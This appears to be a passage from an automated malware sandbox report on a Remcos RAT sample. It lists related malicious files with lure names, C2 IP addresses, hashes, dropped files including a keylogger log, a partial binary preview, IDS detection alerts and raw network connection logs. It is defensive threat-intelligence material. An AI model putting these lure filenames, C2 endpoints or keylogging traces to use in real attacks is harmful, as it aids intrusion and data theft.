                                        • 178.237.33.50
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        TENET-1ZA3i4Pt1KO8v.elfGet hashmaliciousMiraiBrowse
                                        • 146.70.175.253
                                        invoice_#653.exeGet hashmaliciousRemcosBrowse
                                        • 146.70.137.90
                                        Proof of Payment copy.exeGet hashmaliciousRemcosBrowse
                                        • 146.70.57.34
                                        invoice#653.exeGet hashmaliciousRemcosBrowse
                                        • 146.70.137.90
                                        vQPpTr8mfm.elfGet hashmaliciousMiraiBrowse
                                        • 146.69.137.15
                                        5xUAAMwlnJ.elfGet hashmaliciousUnknownBrowse
                                        • 163.200.213.221
                                        45.66.231.148-sparc-2024-07-21T13_11_25.elfGet hashmaliciousMiraiBrowse
                                        • 196.248.86.236
                                        92.249.48.47-skid.ppc-2024-07-20T09_04_20.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 168.172.87.212
                                        92.249.48.47-skid.arm-2024-07-20T09_04_18.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 143.136.117.49
                                        92.249.48.47-skid.x86-2024-07-20T09_04_17.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 152.116.125.227
                                        ATOM86-ASATOM86NLShipping documents PO 16103 INV.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                                        • 178.237.33.50
                                        172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                        • 178.237.33.50
                                        erthings.docGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        girlfrnd.docGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        UD61dgs2rz.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        CLOUDFLARENETUSYcj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                                        • 104.21.65.79
                                        rwsNDpQSKZ.exeGet hashmaliciousLummaCBrowse
                                        • 188.114.97.3
                                        QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        CBS_applcation_details_072602024_xlsx.jsGet hashmaliciousWSHRATBrowse
                                        • 188.114.96.3
                                        FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                        • 104.26.2.16
                                        8SxJ9aYfJ1.exeGet hashmaliciousFormBookBrowse
                                        • 188.114.97.3
                                        e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                        • 104.26.2.16
                                        file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                        • 188.114.96.3
                                        https://www.kudoboard.com/boards/ZWwsi9jgGet hashmaliciousUnknownBrowse
                                        • 172.67.37.149
                                        NsCTgrwBjQ.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.177.136
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        1138de370e523e824bbca92d049a3777FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                        • 173.222.162.64
                                        e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                        • 173.222.162.64
                                        https://busines-support-faceboock.cfd/contract/61558775282504Get hashmaliciousUnknownBrowse
                                        • 173.222.162.64
                                        http://foodnetworkcookingprogramvontest.blogspot.com/?m=1Get hashmaliciousUnknownBrowse
                                        • 173.222.162.64
                                        https://muscletherapytec.com/wp-admin/bvn2/sprom2/popular/4e3ca076003281dc76236e73f1cc5142Get hashmaliciousUnknownBrowse
                                        • 173.222.162.64
                                        http://www.linktr.ee/debank.notificationGet hashmaliciousUnknownBrowse
                                        • 173.222.162.64
                                        http://pancake-swap-alpha-mu.vercel.app/Get hashmaliciousUnknownBrowse
                                        • 173.222.162.64
                                        https://49moleraur.xyz/garantiGet hashmaliciousUnknownBrowse
                                        • 173.222.162.64
                                        https://muscletherapytec.com/wp-admin/bvn2/sprom2/popular/e5ea942a18732b1311810dd2e55b146b/Get hashmaliciousUnknownBrowse
                                        • 173.222.162.64
                                        https://muscletherapytec.com/wp-admin/bvn2/sprom2/popular/17f299cc4b87de0e07a1fdc16d0d9e99/Get hashmaliciousUnknownBrowse
                                        • 173.222.162.64
                                        37f463bf4616ecd445d4a1937da06e19Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.189.102
                                        CBS_applcation_details_072602024_xlsx.jsGet hashmaliciousWSHRATBrowse
                                        • 172.67.189.102
                                        SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.189.102
                                        SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.189.102
                                        SecuriteInfo.com.FileRepMalware.29184.31872.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.189.102
                                        SecuriteInfo.com.FileRepMalware.29184.31872.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.189.102
                                        PO Tournefortian2453525525235235623425523235.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 172.67.189.102
                                        setup.exeGet hashmaliciousAmadeyBrowse
                                        • 172.67.189.102
                                        setup.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                                        • 172.67.189.102
                                        file.exeGet hashmaliciousVidarBrowse
                                        • 172.67.189.102
                                        No context
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):144
                                        Entropy (8bit):3.3742771088625614
                                        Encrypted:false
                                        SSDEEP:3:rhlKlViNWWlWfMfWl5JWRal2Jl+7R0DAlBG45klovDl6v:6lViNWWw5YcIeeDAlOWAv
                                        MD5:F4FB05FF3E051BE54ADB2F966CEADEC6
                                        SHA1:C8A5B0903732A70C6C47CBF57B3EB9A93C39FD2E
                                        SHA-256:D4E6568B0CD9758CDB03851E29831BE6D6DE6B9D8BFB91E3E1EEB29F97F12CFD
                                        SHA-512:561742F0977C7BC4CA46EF7998FFC5350EB4FD3513FE70C4EF75372EB26A68EE8499B5A5FD70E9E42C11BE3055A42A3226CA12E6929033F01912836DF22D0547
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                        Reputation:low
                                        Preview:....[.2.0.2.4./.0.7./.2.7. .0.5.:.3.7.:.1.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                        Process:C:\Users\user\Desktop\41DLTjkmOm.exe
                                        File Type:CSV text
                                        Category:dropped
                                        Size (bytes):425
                                        Entropy (8bit):5.357964438493834
                                        Encrypted:false
                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                                        MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                                        SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                                        SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                                        SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                                        Malicious:true
                                        Reputation:moderate, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..
                                        Process:C:\Users\user\AppData\Roaming\Lamsses.exe
                                        File Type:CSV text
                                        Category:dropped
                                        Size (bytes):425
                                        Entropy (8bit):5.357964438493834
                                        Encrypted:false
                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                                        MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                                        SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                                        SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                                        SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):962
                                        Entropy (8bit):5.013811273052389
                                        Encrypted:false
                                        SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                        MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                        SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                        SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                        SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                        Malicious:false
                                        Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                        Process:C:\Users\user\Desktop\41DLTjkmOm.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):15872
                                        Entropy (8bit):7.9202543406857036
                                        Encrypted:false
                                        SSDEEP:384:n5TFJV4WBKpIocOLVEXagvYcEmLn05M1OTCZ+jvA0g:n5SxIoLLVPkY5OnwBGZ+Q
                                        MD5:1975AEDB92D3702F9F2662BDB8A71719
                                        SHA1:D148F78F8FBF513067AFF4CCE3C60AF644F854D5
                                        SHA-256:3B1107ABB2B9421C634FDFFA70C6F1C112F2CA069B929FC29730BDBE8796C963
                                        SHA-512:540B081C2A2950A9A2132E837A143F2B175DC02BB66FEA32481542895824D378EA0DBAEAB4C920201808EE28DE2D4A23E15AE0184AF21ECE7B92C1BAD26E0FA4
                                        Malicious:false
                                        Preview:M4...&.....|*u........8@#...<.H...0.Ko..W.%5%.u..... ....J-=1'..rk.R..!.X.Y.S.i1.vlU.pan.dH.t-;.u.. `..a"X.m2.-x`J.$.._...P...l.n,.....P..........\....S....~BN}..*.K..Q.).^... `+..}.L.];_.6...yv.........VB.U#...+S.^....z.../\...../u...h.....lcU..FG.^B.f..2.....Jh...6..&.81.....J..;....(.n6e:..,...:..W..U~e...8.......FJ.......p.\...\P>............NZ.y.>.0.7+~...5z.~^TA.n#.gr...{H!...+..........&.....o..HLk|q.`a.C..v'.qC.g.#u{p..$.....m.........6&G.C.].w.olo......kU....%..fp9............0'..7.'9H.Y..2..$...t.|.<0....X."...O.k...7.d.3...j%.....B2$j...,.r.0.....Q!*...&......|V.%..w.%.....B...|..b..E.j(+.\..1.N.uU...Q.<}.mvG.."+..U.....&.i...!.;..MQ.O..b........?....c...........|f.PJ..sl.....i.......{..~...Z.s4l.P..B(..n.$...=.l....,c$h..,.`.`r......<....H.8...m.W..e"..3...../..........<..pK.M..tM.{(...!.)....r..."...:wN.L....k.................P%......Tm..Gbq...oc|...?.J...z.......C...ixm......2.N/.D.......<....t.FG./.......HH.,... .ca.m.......|.F}5..
                                        Process:C:\Users\user\Desktop\41DLTjkmOm.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):494592
                                        Entropy (8bit):7.95553157792528
                                        Encrypted:false
                                        SSDEEP:12288:ZmKD2ZcBuqqbIBn2f+s80Rfy1P3qM+xXYKH:oKD2qib8sw0RfyBV+Z
                                        MD5:45A2FEF827837AC236AB4E26B3B8F886
                                        SHA1:500D37606126E2F256F5BB876F4357D2D3793EAB
                                        SHA-256:F7DD7CFC6779DB6502820D5C5C499C5DD060271EEBEAE92A7EED9A290159F903
                                        SHA-512:7ECA197AF57992E65A2C0D7F185409C99223769AF58D6F95D532839FE37C2FCBAC7C21FC84C111256AF116AAE3B40EDA1E5A5791A0350778E466E45F10CE69B9
                                        Malicious:false
                                        Preview:M4...&.....|*u........8@#...<.H...0.Ko..W.%5%.u..... ....J......I.$.K.!......i..{p.a....e..t.=.F..g b......m..1..0$.C.....6$..#.HE.O...Y..Q........$H:..S.d.`.A..xH..'.c{.c}*q.E*|...l..^..;N.F)...o.A.+..nI.H..D...J....../.....!AN=./Y....gR.n.-Y^..[....4...i.y.."P..;N........RQ...>.E........*..@.-G....?..=.....v.............W.\....w....w..e;&{L........&.I.!..O..`.......Y.......!/..>T.v.o._...cp...W.../.<~..QQ.q....-Y.(..i@..r..Z..-..E#..'..vc...V.AN..x..c.......d...Q..r.;.Z...~]..q.....<.`........z..MQY.u.K.].y.......A9..{L/....;.etO'..eT..@.`.q,LHxAG..u.<$.!.....*.../.....+.....D.........x....."&i.7...ZNUp...K-.....M}..^p......$".G.......X..[.....+..0y..8b..d.V...9..+.L.h...L........?.BP._.j.u....!..].........D......X.)f%.@..G...t..\..S..8.O/...8e9..d...|.~.o...6k....i.z...c...]AEV5....Lq.W.._....<..x..(....^,...U.W...KqW.........wEx/).:2.R..y.....(./.|..D.1.-..d......C>..{.I.bwEy...V/..-..2.b..h....+.#...>........70....u..An.7.F$2.H...P..<...
                                        Process:C:\Users\user\Desktop\41DLTjkmOm.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):900608
                                        Entropy (8bit):4.891884878400808
                                        Encrypted:false
                                        SSDEEP:1536:eywzb8kIR7zHKR/sxXsX9jz9jEOCKDncxVvPeLuBT+V48I/0Is0NSRCtQnyuaXaZ:eyb1NKV4mwX/b6f8twq
                                        MD5:922AEE056087550DAF3F1F73AFE27981
                                        SHA1:9343B922A98667A6CA1224AB67323F557E176DE7
                                        SHA-256:37C8AFC687419DFC68E7F63C28C0CBBC11CA34CFD32B095711F7A8818788931F
                                        SHA-512:747A358DA2760C6720E4A4FC6633AEAA2DE1929D17098373F4CD39949A57F87E5E5F802EAE8922C6A197F17DFC83BA1FAB70E772D78509EA3F80667DF7EA6C7A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 42%
                                        • Antivirus: Virustotal, Detection: 23%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...XK.f............................".... ........@.. ....................................@.....................................L...................................8...............................................0................ ..H............text........ ...................... ..`.reloc..............................@..B........................................................H........}...[...........9..\C..........................................".(.....*...>.(.......}....*..{....*"..}....*....0............{.....8.....*......0............{.....8.....*......0..;........s....}.....s....}.....(.......s....%.o.....%.o.....(.....*......0...........~.....8.....*......".......*....0....................(....r...p..(....r...p(....(.......8.......X..........X.........-.......s.........8#.....(....(.................X......X...........-.....8......*......0 .B.......
                                        Process:C:\Users\user\Desktop\41DLTjkmOm.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):4.891884878400808
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:41DLTjkmOm.exe
                                        File size:900'608 bytes
                                        MD5:922aee056087550daf3f1f73afe27981
                                        SHA1:9343b922a98667a6ca1224ab67323f557e176de7
                                        SHA256:37c8afc687419dfc68e7f63c28c0cbbc11ca34cfd32b095711f7a8818788931f
                                        SHA512:747a358da2760c6720e4a4fc6633aeaa2de1929d17098373f4cd39949a57f87e5e5f802eae8922c6a197f17dfc83ba1fab70e772d78509ea3f80667df7ea6c7a
                                        SSDEEP:1536:eywzb8kIR7zHKR/sxXsX9jz9jEOCKDncxVvPeLuBT+V48I/0Is0NSRCtQnyuaXaZ:eyb1NKV4mwX/b6f8twq
                                        TLSH:281571E1D4D11B9953B1FC276BD97C2D899D549FA9BA62803C2C32771B3B864843FB08
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...XK.f............................".... ........@.. ....................................@................................
                                        Icon Hash:00928e8e8686b000
                                        Entrypoint:0x4dd922
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x66A24B58 [Thu Jul 25 12:55:52 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [004DD930h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add al, D9h
                                        or eax, 00000000h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax+4Bh], bl
                                        mov byte ptr [00000066h], al
                                        add byte ptr [edx], al
                                        add byte ptr [eax], al
                                        add byte ptr [ebx+00h], cl
                                        add byte ptr [eax], al
                                        push esp
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xdd8d40x4c.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xde0000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xdd9380x1c.text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0xdd9300x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xdb99f0xdba00b255358ea0e0c18b374fcc42f283dc4bFalse0.13991578329538987data4.889238388582852IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .reloc0xde0000xc0x200325b6fc9644291ce95d31f1ac60c297aFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        DLLImport
                                        mscoree.dll_CorExeMain
                                        TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                        2024-07-27T11:37:17.560699+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection497173363192.168.2.6146.70.57.34
                                        2024-07-27T11:38:07.387913+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972552.165.165.26192.168.2.6
                                        2024-07-27T11:37:15.216940+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection497163363192.168.2.6146.70.57.34
                                        2024-07-27T11:37:12.316519+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH49714443192.168.2.6172.67.189.102
                                        2024-07-27T11:37:13.295240+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH49715443192.168.2.6172.67.189.102
                                        2024-07-27T11:37:17.084329+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa4971880192.168.2.6178.237.33.50
                                        2024-07-27T11:37:29.881105+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971952.165.165.26192.168.2.6
                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 27, 2024 11:37:08.638807058 CEST49674443192.168.2.6173.222.162.64
                                        Jul 27, 2024 11:37:08.638807058 CEST49673443192.168.2.6173.222.162.64
                                        Jul 27, 2024 11:37:08.982595921 CEST49672443192.168.2.6173.222.162.64
                                        Jul 27, 2024 11:37:11.230256081 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:11.230310917 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:11.230407000 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:11.235230923 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:11.235263109 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:11.734671116 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:11.734841108 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.035358906 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.035409927 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.035787106 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.035854101 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.037910938 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.084505081 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.316567898 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.316677094 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.316720009 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.316771030 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.316816092 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.316876888 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.316910028 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.316981077 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.316994905 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.317071915 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.317092896 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.317142963 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.317205906 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.317271948 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.317293882 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.317342043 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.317346096 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.317392111 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.317397118 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.317440987 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.317449093 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.317495108 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.320941925 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.320995092 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.397773981 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.397845984 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.397881985 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.397912025 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.397943020 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.397979021 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.398076057 CEST49714443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.398109913 CEST44349714172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.510329962 CEST49715443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.510394096 CEST44349715172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:12.510478020 CEST49715443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.510732889 CEST49715443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:12.510752916 CEST44349715172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:13.007855892 CEST44349715172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:13.008080006 CEST49715443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:13.008718014 CEST49715443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:13.008729935 CEST44349715172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:13.009002924 CEST49715443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:13.009008884 CEST44349715172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:13.295265913 CEST44349715172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:13.295396090 CEST44349715172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:13.295496941 CEST49715443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:13.295496941 CEST49715443192.168.2.6172.67.189.102
                                        Jul 27, 2024 11:37:13.295573950 CEST44349715172.67.189.102192.168.2.6
                                        Jul 27, 2024 11:37:13.295669079 CEST49715443192.168.2.6172.67.189.102
